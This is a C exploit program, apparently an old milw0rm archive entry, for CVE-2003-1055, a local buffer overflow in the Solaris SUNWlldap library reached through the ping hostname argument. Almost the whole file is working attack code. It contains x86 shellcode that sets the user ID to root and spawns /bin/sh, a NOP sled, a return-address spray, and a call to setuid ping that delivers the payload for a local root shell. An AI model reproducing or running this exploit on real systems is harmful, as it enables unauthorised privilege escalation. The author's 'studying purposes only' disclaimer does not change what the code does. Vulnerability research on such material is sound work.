Sun SUNWlldap Library Hostname - Local Buffer Overflow - CVE-2003-1055

1. /***********************************************************
2. * hoagie_solarisldap.c
3. *
4. * gcc hoagie_solarisldap.c -o hoagie_solarisldap
5. *
6. * Author: Andi <andi@void.at>
7. *
8. * Greetz to Greuff, philipp and the other hoagie-fellas :-)
9. *
10. * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
11. * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
12. * DAMAGE DONE USING THIS PROGRAM.
13. *
14. *
15. * Offsets: 9208 ... without patch 108994-11
16. *
17. ************************************************************/
18.  
19. #include <stdio.h>
20.  
21. #define NOP 0x90
22. #define ORIGSIZE 258
23.  
24. char shellcode[]=
25. /* main: */
26. "\xeb\x0a" /* jmp initcall */
27.  
28. /* initlcall: */
29. "\x9a\x01\x02\x03\x5c\x07\x04" /* lcall */
30. "\xc3" /* ret */
31.  
32. /* jmpz: */
33. "\xeb\x05" /* jmp setuidcode */
34.  
35. /* initcall: */
36. "\xe8\xf9\xff\xff\xff" /* call jmpz */
37.  
38. /* setuidcode: */
39. "\x5e" /* popl %esi */
40. "\x29\xc0" /* subl %eax, %eax */
41. "\x88\x46\xf7" /* movb %al, 0xfffffff7(%esi) */
42. "\x89\x46\xf2" /* movl %eax, 0xfffffff2(%esi) */
43.  
44. /* seteuid(0); */
45. "\x50" /* pushl %eax */
46. "\xb0\x8d" /* movb $0x8d, %al */
47. "\xe8\xe0\xff\xff\xff" /* call initlcall */
48. /* setuid(0); */
49. "\x29\xc0" /* subl %eax, %eax */
50. "\x50" /* pushl %eax */
51. "\xb0\x17" /* movb $0x17, %al */
52. "\xe8\xd6\xff\xff\xff" /* call initlcall */
53.  
54. "\xeb\x1f" /* jmp callz */
55.  
56. /* start: */
57. /* execve /bin/sh */
58. "\x5e" /* popl %esi */
59. "\x8d\x1e" /* leal (%esi), %ebx */
60. "\x89\x5e\x0b" /* movl %ebx, 0x0b(%esi) */
61. "\x29\xc0" /* subl %eax, %eax */
62. "\x88\x46\x19" /* movb %al, 0x19(%esi) */
63. "\x89\x46\x14" /* movl %eax, 0x14(%esi) */
64. "\x89\x46\x0f" /* movl %eax, 0x0f(%esi) */
65. "\x89\x46\x07" /* movl %eax, 0x07(%esi) */
66. "\xb0\x3b" /* movb $0x3b, %al */
67. "\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx */
68. "\x51" /* pushl %ecx */
69. "\x51" /* pushl %ecx */
70. "\x53" /* pushl %ebx */
71. "\x50" /* pushl %eax */
72. "\xeb\x18" /* jmp lcall */
73.  
74. /* callz: */
75. "\xe8\xdc\xff\xff\xff" /* call start */
76.  
77. "\x2f\x62\x69\x6e\x2f\x73\x68" /* /bin/sh */
78. "\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"
79.  
80. /* lcall: */
81. "\x9a\x04\x04\x04\x04\x07\x04"; /* lcall */
82.  
83.  
84.  
85. unsigned long getsp(void)
86. {
87. __asm__(" movl %esp,%eax ");
88. }
89.  
90. int main(int argc, char **argv) {
91. char buf[512];
92. int offset = 9208;
93. int retaddr = 0;
94. int i;
95.  
96. if (argc > 1) {
97. sscanf(argv[1], "%d", &offset);
98. }
99.  
100. printf("hoagie_solarisldap local root exploit\n");
101. printf("[*] offset: 0x%x\n", offset);
102.  
103. memset(buf, NOP, sizeof(buf));
104. buf[28] = 0xeb;
105. buf[29] = 30;
106. for (i = 0; i < strlen(shellcode); i++) {
107. buf[i + 60] = shellcode[i];
108. }
109.  
110. retaddr = getsp() - offset;
111. printf("[*] return address: 0x%x\n", retaddr);
112.  
113. for (i = 0; i < 4 * 25; i += 4){
114. buf[i + ORIGSIZE + 2] = retaddr & 0xff;
115. buf[i + ORIGSIZE + 3] = (retaddr >> 8 ) &0xff;
116. buf[i + ORIGSIZE + 0] = (retaddr >> 16 ) &0xff;
117. buf[i + ORIGSIZE + 1] = (retaddr >> 24 ) &0xff;
118. }
119.  
120. execl("/usr/sbin/ping", "ping", buf, NULL);
121. }
122.  
123.  
124. // milw0rm.com [2003-04-01]
125.